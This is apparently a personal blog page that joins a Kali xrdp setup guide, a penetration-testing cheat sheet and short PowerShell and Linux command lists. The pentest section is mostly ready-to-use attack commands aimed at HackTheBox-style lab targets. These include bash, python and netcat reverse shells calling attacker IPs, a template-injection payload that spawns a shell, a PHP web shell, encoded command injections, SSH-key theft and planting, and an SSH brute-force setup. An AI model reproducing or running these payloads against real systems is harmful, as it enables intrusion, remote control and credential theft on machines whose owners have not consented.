I am a big fan of VM’s, but not such a fan of the tools used to connect to them in most instances.

Hyper-V, vSphere remote console, VMWare player, they all feel clunky, have inconsistent features and lack some of the basics I really enjoy from modern RDP.

Kali does not have this out of the box, so lets see if we can enable it.

Take a fresh kali install, and lets open a terminal:

apt-get update 
apt-get install xrdp 
systemctl start xrdp
systemctl start xrdp-sesman


systemctl enable xrdp
systemctl enable xrdp-sesman

Now there are a few configuration items we need to make.

Only one “X” session is allowed by default, which means if you will get a black screen after trying to connect if you are also on the machine locally.

It can also be a problem if your session gets disconnected, as there are times when re-connecting to the existing session will fail.

Lets make an edit to the /etc/xrdp/startwm.sh file.

Add these lines before the “test -x /etc/x11/xession && exec ” line:

unset DBUS_SESSION_BUS_ADDRESS
unset XDG_RUNTIME_DIR
. $HOME/.profile

at this point, I like to reboot the machine to emulate a fresh session and see what we get:

Beautiful!

Now we have a full RDP session, with copy and paste and a 4k resolution!

updated 22/01/2022

Scanning Tools:

Rustscan

Find open ports – similar to nmap but quicker.

Requires docker for install

rustscan -a **Hostname** -u 2500

Nmap

Find open ports and services

Scan for Services:

nmap **hostname** -v -sV

Run default scripts on found services:

nmap **hostname** -v -sV -Sc

Strings

Find all strings in a file

strings **filename**

Binwalk

Find all files embedded in a file

binwalk -e **filename**

---

Enumeration Tools:

Amass subdomain scanner

amass -d **domain** **anotherdomain**

lse.sh

https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh

Enum4Linux

Enumerates Linux hosts

enum4linux -a 10.10.11.108

FFUF

#subdomain
ffuf -c -u http://devzat.htb -H "Host: FUZZ.devzat.htb" -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -mc 200


#files
ffuf -u http://pets.devzat.htb/FUZZ -w ~/tools/SecLists/Discovery/Web-Content/raft-small-words.txt -fs 510

PSPY

Resource monitoring without root

https://github.com/DominicBreuker/pspy

GoBuster

Enumerates websites based on a worldlist.

Directories:
gobuster dir -u **hostname** -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --wildcard

Subdomains:
gobuster vhost -u **hostname**  -w /home/dev/subdomains-top1million-110000.txt -r 

PHP Files:

gobuster dir-u **hostname**  -w /home/dev/subdomains-top1million-110000.txt -xphp

DirSearch

Web enumeration

python3 dirsearch.py -u 10.10.11.104  

WFuzz

Subdomain:
wfuzz -w **wordlist** -u http://**HOST**/ --hc 301 -v -c -H "Host:FUZZ.**hostname**"


Pages:
wfuzz -w **wordlist** -u http://**SUBDOMAIN.HOST**/FUZZ -v -c --hc 404,403 -hw 33  

Parameters:
wfuzz -u http://10.10.11.135/image.php?FUZZ=/etc/passwd -w /usr/share/SecLists/Discovery/Web-Content/burp-parameter-names.txt -t 50 --hh 0

Whatweb

Determines the type of a website, such as “WordPress”

whatweb **hostname**

Searchsploit

Searches for exploits in a given platform

searchsploit **platform** **version**

e.g:

searchsploit wordpress 5.8.2

Find files with read/write access

find / -type f -user **user** -perm 600 2>/dev/null

WordPress Scan

Scans wordpress sites

wpscan --url http://**HOSTNAME**/ --api-token **TOKEN** --enumerate p,u --plugins-detection aggressive

Find SETUID files

find / -perm -u=s -type f 2>/dev/null

---

Command Injection Examples

PHP

<?php system($_GET[cmd]);?>

Reconnaissance tools:

Chisel

Allows you to redirect traffic from a running port or service by using a client and server on each target.

Server:

git clone https://github.com/jpillora/chisel
cd chisel && CGO_ENABLED=0 go build -ldflags="-s -w"
sudo ./chisel server -p 8000 --reverse

Client:

./chisel client **SERVERIP**:8000 R:**porttoforward**:127.0.0.1:**porttoforward**

Port Forward traffic using SSH

ssh -i **privateKey** -L **portToForward**:127.0.0.1:**portToForward** **user@host**

Netcat

open a specified port and listen:

sudo nc -lvnp **port**

make a connection

nc **host**

Git Extractor

wget https://raw.githubusercontent.com/internetwache/GitTools/master/Extractor/extractor.sh

Git Dumper

wget https://raw.githubusercontent.com/internetwache/GitTools/master/Extractor/extractor.sh

/gitdumper.sh http://pets.devzat.htb/.git/ HTBdevzat

Identify Hashed strings

https://hashes.com/en/tools/hash_identifier

---

Privilege Escalation

Extract user ssh key

#extract the key
echo $(cat /home/**user**/.ssh/id_rsa) > /dev/tmp/key`;

#place it in the client system, use it to make a ssh connection
ssh -i *keyfile* user@hostname.fqdn

Useful File Locations:

Linux

/etc/passwd
/etc/shadow
/var/log/mysql/error.log

Resources:

Exploit DB

https://www.exploit-db.com/

Reverse Shell Guide

https://sentrywhale.com/documentation/reverse-shell

Sub Domain List

https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-110000.txt

Vulners

http://vulners.com

---

Exploit Tools

Evil-WinRM

Access Win-rm using linux

evil-winrm -i **hostname** -u **user** -p **password**

crackmap

Exploitation tool for linux which targets a number of protocols.

SMB – check credentials:

crackmapexec smb **hostname** -u **user** -p **password**

winrm – check credentials:

crackmapexec winrm **hostname** -u **user** -p **password**

MetaSploit

init the framework:

 sudo msfdb init

start DB:

sudo msfdb start

connect to console:

msfconsole -q

search for exploit:

search **platformname**

get current user:

getuid

execute a remote command:

execute -f cmd.exe -c -i

spawn a listener:

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost <mymachine>
set lport <myport>
run

Shell one Liners:

Serverside Template Injection

{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc *IP* *PORT* >/tmp/f')|attr('read')()}}

Python3

exec python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",12234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Bash

bash -c 'bash -i >& /dev/tcp/**ip**/**port** 2>&1

bash -c 'bash -i >& /dev/tcp/**IP**/**port** 0>&1'

mkfifo /tmp/lol;nc **IP** **PORT** 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lol

Encode to base 64

#encode
 echo -n 'bash -i >& /dev/tcp/10.10.14.6/9001 0>&1' | base64

#server (inject into web parameter)
echo -n ***encodedstring*** | base64 -d | bash

URL encoded Bash

bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.8/9001+0>%261'

NC

nc **clientip** -e /bin/bash

Web

%26/bin/bash+-c+'bash+-i+>+/dev/tcp/**IP**/**Port**+0>%261'

---

Stabilizing a shell

Python

python -c 'import pty;pty.spawn("/bin/bash")'

---

Inject SSH-key to target machine:

On Client:
ssh-keygen -t rsa -b 4096 -C '**user@domain**' -f **outputfile** -P ''
export PUBLIC_KEY=$(cat **outputfile**.pub)

Code Injection:
mkdir -p /home/**targetuser**/.ssh; echo $PUBLIC_KEY >> /home/**targetuser**/.ssh/authorized_keys"

---

CURL encode payload data

curl -i -H "**headers**" '**url**' -G --data-urlencode "**injectionPoint**;**injected commands**"

---

Privilege Escalation

Install ssh key via symlink

#*fileToWrite* must be named id_rsa.pub or keys
ln -s /root/.ssh/authorized_keys *fileToWriteTo*

Spawn a python webserver in current folder

python3 -m http.server 80

---

SSH Brute Force

msfconsole
use auxilary/scanner/ssh/ssh_login
set rhosts *target*
set username root
set pass_file *wordlist*
set verbose true
set stop_on_success
run

This PowerShell cheat sheet will list for you a number of commands that I often find useful.

Lets get started with some that are more simple:

Class Definition in PowerShell:

Class MyClass(){
MyClass(){
}


}

Return from a function PowerShell:

Class MyClass(){
#function returns a string variable type
[string]exampleFunction(){
$string = example
return $string
}

}

Get All Files in a Directory:

Get-childitem -path $path

This will return all files in the current directory.

Loop over files in a directory:

Get-Childitem -path $path | foreach{ ** do something ** }

This will ** do something ** to all the files in the directory

Linux Command Cheat Sheet.

System Information:

uname -a

This will return some useful information about the specific flavour of the OS and its kernel.

Shutdown / Restart

shutdown -r now

or:

init 6

This will restart the current system

Dump a SQLite database

sqlite3 /path/to/file

.output /path/to/save/output

.dump

.exit